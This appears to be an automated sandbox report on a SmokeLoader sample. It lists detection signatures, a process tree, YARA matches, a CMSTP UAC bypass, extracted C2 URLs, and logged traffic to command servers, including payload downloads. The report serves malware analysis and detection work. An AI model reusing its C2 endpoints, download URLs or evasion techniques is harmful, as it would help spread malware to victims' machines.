Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:753427
MD5:44c87d3bc316eefe4dcbf66afed72abc
SHA1:96bde412ef761b4d53506ae4ed2999bc9dcaf137
SHA256:731e22be2a6b39304919dc24b750a720b23a0f1ed996a9b74cf0b088de6144b1
Tags:exe
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected UAC Bypass using CMSTP
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • file.exe (PID: 5020 cmdline: C:\Users\user\Desktop\file.exe MD5: 44C87D3BC316EEFE4DCBF66AFED72ABC)
    • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • B87E.exe (PID: 3316 cmdline: C:\Users\user\AppData\Local\Temp\B87E.exe MD5: 1BD9FB4ADE498938E6432D6C5D1E23A5)
        • rundll32.exe (PID: 2980 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp",Worhdhqfpryr MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • EBC4.exe (PID: 4608 cmdline: C:\Users\user\AppData\Local\Temp\EBC4.exe MD5: F06F222962C48BB7D822AC0FCD14CFD2)
  • gfgsrbs (PID: 5000 cmdline: C:\Users\user\AppData\Roaming\gfgsrbs MD5: 44C87D3BC316EEFE4DCBF66AFED72ABC)
  • EBC4.exe (PID: 2760 cmdline: "C:\Users\user\AppData\Local\Temp\EBC4.exe" MD5: F06F222962C48BB7D822AC0FCD14CFD2)
  • cleanup
{"C2 list": ["http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/", "http://piratia.su/tmp/"]}
SourceRuleDescriptionAuthorStrings
00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x344:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x744:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      0000000C.00000002.507752658.0000000000413000.00000040.00000001.01000000.00000009.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        Click to see the 17 entries
        SourceRuleDescriptionAuthorStrings
        12.2.EBC4.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          12.2.EBC4.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
          • 0x10000:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
          • 0x100a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
          • 0x10170:$s2: Elevation:Administrator!new:
          7.2.EBC4.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            7.2.EBC4.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
            • 0x10000:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
            • 0x100a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
            • 0x10170:$s2: Elevation:Administrator!new:
            No Sigma rule has matched
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://piratia.su/tmp/URL Reputation: Label: malware
            Source: http://piratia.su/tmp/URL Reputation: Label: malware
            Source: freeshmex.atVirustotal: Detection: 18%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmpReversingLabs: Detection: 24%
            Source: C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmpVirustotal: Detection: 35%Perma Link
            Source: file.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\gfgsrbsJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeJoe Sandbox ML: detected
            Source: 12.2.EBC4.exe.2d5112c.2.unpackAvira: Label: TR/Patched.Ren.Gen7
            Source: 5.2.B87E.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
            Source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/", "http://piratia.su/tmp/"]}
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004AFD42 CryptGetHashParam,CryptDestroyHash,
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_0046A04E CryptEncrypt,
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004E828B CryptEncrypt,
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004AF42D CryptHashData,CryptHashData,
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B74F7 CryptExportKey,
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B6481 CryptExportKey,
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004AE5BE CryptBinaryToStringA,
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B776F CryptReleaseContext,
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B3784 CryptDecrypt,
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004C3A08 CryptImportKey,
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004C3AD6 CryptDestroyKey,CryptDestroyKey,
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004C3A88 CryptEncrypt,CryptEncrypt,
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B3B61 CryptReleaseContext,
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004C3B30 CryptReleaseContext,CryptReleaseContext,
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004AEBD6 CryptAcquireContextA,CryptAcquireContextA,
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004C3D56 CryptBinaryToStringA,CryptBinaryToStringA,
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004C3D04 CryptBinaryToStringA,CryptBinaryToStringA,
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B2E2B CryptHashData,CryptHashData,
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B6ECB CryptExportKey,

            Exploits

            barindex
            Source: Yara matchFile source: 12.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.507752658.0000000000413000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.489025318.0000000000413000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY

            Compliance

            barindex
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeUnpacked PE file: 5.2.B87E.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeUnpacked PE file: 7.2.EBC4.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeUnpacked PE file: 12.2.EBC4.exe.400000.0.unpack
            Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
            Source: unknownHTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.4:49715 version: TLS 1.2
            Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: EBC4.exe, 00000007.00000002.489007839.0000000000410000.00000040.00000001.01000000.00000009.sdmp, EBC4.exe, 0000000C.00000002.507739087.0000000000410000.00000040.00000001.01000000.00000009.sdmp
            Source: Binary string: C:\cine\zu.pdb source: EBC4.exe, 00000007.00000000.479192618.0000000000401000.00000020.00000001.01000000.00000009.sdmp, EBC4.exe, 0000000C.00000000.488527200.0000000000401000.00000020.00000001.01000000.00000009.sdmp, EBC4.exe.1.dr
            Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\supohizoza_pujuvi\reyo fewokelobivuvi80\yahomizidita\huhise.pdb source: B87E.exe, 00000005.00000000.450920035.0000000000401000.00000020.00000001.01000000.00000007.sdmp, B87E.exe.1.dr
            Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp, EBC4.exe, 0000000C.00000002.514725083.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: BC:\supohizoza_pujuvi\reyo fewokelobivuvi80\yahomizidita\huhise.pdb` source: B87E.exe, 00000005.00000000.450920035.0000000000401000.00000020.00000001.01000000.00000007.sdmp, B87E.exe.1.dr
            Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp, EBC4.exe, 0000000C.00000002.514725083.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\benejizipica\vexihosibul\fubecilecoz58_wowuceroweman-56\c.pdb source: file.exe, gfgsrbs.1.dr
            Source: Binary string: DC:\benejizipica\vexihosibul\fubecilecoz58_wowuceroweman-56\c.pdb source: file.exe, gfgsrbs.1.dr

            Networking

            barindex
            Source: C:\Windows\explorer.exeDomain query: thepokeway.nl
            Source: C:\Windows\explorer.exeDomain query: freeshmex.at
            Source: C:\Windows\explorer.exeNetwork Connect: 123.253.32.170 80
            Source: Malware configuration extractorURLs: http://cracker.biz/tmp/
            Source: Malware configuration extractorURLs: http://piratia-life.ru/tmp/
            Source: Malware configuration extractorURLs: http://piratia.su/tmp/
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: Joe Sandbox ViewIP Address: 178.31.176.42 178.31.176.42
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.2Date: Thu, 24 Nov 2022 19:13:08 GMTContent-Type: application/octet-streamContent-Length: 1041408Last-Modified: Thu, 24 Nov 2022 19:10:04 GMTConnection: keep-aliveETag: "637fc18c-fe400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 57 b6 e1 fb 13 d7 8f a8 13 d7 8f a8 13 d7 8f a8 ae 98 19 a8 12 d7 8f a8 0d 85 1a a8 0c d7 8f a8 0d 85 0c a8 96 d7 8f a8 34 11 f4 a8 1a d7 8f a8 13 d7 8e a8 87 d7 8f a8 0d 85 0b a8 3d d7 8f a8 0d 85 1b a8 12 d7 8f a8 0d 85 1e a8 12 d7 8f a8 52 69 63 68 13 d7 8f a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8d 67 92 62 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 9e 01 00 00 3a 30 00 00 00 00 00 e6 6f 00 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 31 00 00 04 00 00 0d 84 10 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c a0 01 00 64 00 00 00 00 80 31 00 e8 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 3c 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 9c 01 00 00 10 00 00 00 9e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 cf 2f 00 00 b0 01 00 00 12 0e 00 00 a2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 2e 00 00 00 80 31 00 00 30 00 00 00 b4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: GET /upload/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: thepokeway.nl
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://crimlvf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hdnuetf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jccvg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fjuand.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ugahgtu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: freeshmex.at
            Source: global trafficHTTP traffic detected: GET /root2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 123.253.32.170
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cbcxtvmmly.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jmhsk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cxmexebq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yvudclyoxi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ewydclhcm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ufwbup.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dmwhplnj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xrqcl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uuvtnsw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fffclev.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ykhdc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qhcqdle.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bussc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rfiijpjae.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bowsudmxn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://slkwmgvhmh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bpaefk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uaymxpjge.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 300Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wfwtjemoof.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rpaquepn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uphkrwii.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mifwrnveyh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://motvx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bfgpwwck.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://agqugnol.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gxxlrwdw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 172Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jhiornjar.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sloljasy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yrxav.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: freeshmex.at
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
